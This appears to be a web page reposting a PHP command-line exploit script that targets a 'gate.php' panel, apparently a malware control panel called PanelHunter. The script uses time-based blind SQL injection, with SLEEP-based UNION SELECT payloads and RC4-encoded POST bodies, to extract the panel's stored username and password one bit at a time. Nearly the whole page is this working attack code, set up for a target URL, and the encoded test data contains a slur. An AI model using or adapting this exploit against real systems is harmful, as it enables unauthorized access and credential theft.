Security entry villages loophole - SQL injection

    باستخدامك لموقعنا الإلكتروني، فأنت تقبل استخدام ملفات تعريف الارتباط بهدف إضافة المزيد من المتعة على زيارتك، ولتقديم إعلانات ومحتويات مُصمَّمة خصيصًا وفقًا لاهتماماتك، وللسماح لك بمشاركة المحتويات على شبكات التواصل الاجتماعي، ولإنشاء إحصائيات عن الزائرين من أجل تحسين الموقع الإلكتروني. المزيد من المعلومات

    • Security entry villages loophole - SQL injection

      PHP Source Code

      1. <?php
      2. ********// PanelHunter.zip hash: c49c74a609b24284a0a66fc008c4d8f2
      3. ********// Start with PHP CLI (php pwn.php)
      4. ********set_time_limit(0);
      5. *********
      6. ********// Adjust this :)
      7. ********define('SLEEP_TIME', '4');
      8. ********define('PAGE_TIME',* 4);
      9. ********define('URL',******* 'http://localhost/Phase/');
      10. *********
      11. ********echo('attacking ' . URL . PHP_EOL);
      12. *********
      13. ********get_string('username');
      14. ********get_string('password');
      15. *********
      16. ********function get_length($field) {
      17. ****************$length = 1;
      18. *****************
      19. ****************while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
      20. ************************++$length;
      21. ****************}
      22. *****************
      23. ****************echo($field . ' length: ' . $length . PHP_EOL);
      24. *****************
      25. ****************return $length;
      26. ********}
      27. *********
      28. ********function get_string($field) {
      29. ****************$length = get_length($field);
      30. ****************$str*** = '';
      31. *****************
      32. ****************for ($i = 0; $i < $length; ++$i) {
      33. ************************$str .= chr(get_char($field, $i));
      34. ************************echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
      35. ****************}
      36. *****************
      37. ****************return $str;
      38. ********}
      39. *********
      40. ********function get_char($field, $id) {
      41. ****************$binary = '';
      42. *****************
      43. ****************for ($i = 1; $i < 256; $i *= 2) {
      44. ************************if ($i == 128)
      45. ********************************$binary = '0' . $binary;
      46. ************************else
      47. ********************************$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
      48. ****************}
      49. *****************
      50. ****************return bindec($binary);
      51. ********}
      52. *********
      53. ********function is_true($query) {
      54. ****************$rc4_key** = 'aaaa'; // b d u
      55. ****************$data***** = 'u=tapz&d=faggot&b=lol';
      56. ****************$encode*** = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
      57. ****************$encode*** = $rc4_key . $encode;
      58. ****************$injection = urlencode($query);
      59. ****************$req****** = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
      60. *****************
      61. ****************return !($req['time'] < PAGE_TIME);
      62. ********}
      63. *********
      64. ********function post_request($url, $data) {
      65. ********$handle = curl_init($url);
      66. *********
      67. ********curl_setopt($handle, CURLOPT_HEADER,******** false);
      68. ********curl_setopt($handle, CURLOPT_USERAGENT,***** 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
      69. ********curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
      70. ********curl_setopt($handle, CURLOPT_POST,********** true);
      71. ********curl_setopt($handle, CURLOPT_POSTFIELDS,**** $data);
      72. ****************curl_setopt($handle, CURLOPT_TIMEOUT,******* 30);
      73. *********
      74. ****************$time = microtime(true);
      75. ********$page = curl_exec($handle);
      76. ********$time = microtime(true) - $time;
      77. *****************
      78. ********curl_close($handle);
      79. *****************
      80. ********return array(
      81. ************************'page' => $page,
      82. ************************'time' => $time
      83. ****************);
      84. ****}
      85. *********
      86. ********function rc4($pwd, $data, $data_length, $pwd_length){
      87. ****************$key[] = '';
      88. ****************$box[] = '';
      89. ****************$cipher = '';
      90. *
      91. ****************for ($i = 0; $i < 256; $i++)
      92. ****************{
      93. ************************$key[$i] = ord($pwd[$i % $pwd_length]);
      94. ************************$box[$i] = $i;
      95. ****************}
      96. ****************for ($j = $i = 0; $i < 256; $i++)
      97. ****************{
      98. ************************$j = ($j + $box[$i] + $key[$i]) % 256;
      99. ************************$tmp = $box[$i];
      100. ************************$box[$i] = $box[$j];
      101. ************************$box[$j] = $tmp;
      102. ****************}
      103. ****************for ($a = $j = $i = 0; $i < $data_length; $i++)
      104. ****************{
      105. ************************$a = ($a + 1) % 256;
      106. ************************$j = ($j + $box[$a]) % 256;
      107. ************************$tmp = $box[$a];
      108. ************************$box[$a] = $box[$j];
      109. ************************$box[$j] = $tmp;
      110. ************************$k = $box[(($box[$a] + $box[$j]) % 256)];
      111. ************************$cipher .= chr(ord($data[$i]) ^ $k);
      112. ****************}
      113. ****************return $cipher;
      114. ********}
      115. *
      إظهار الكل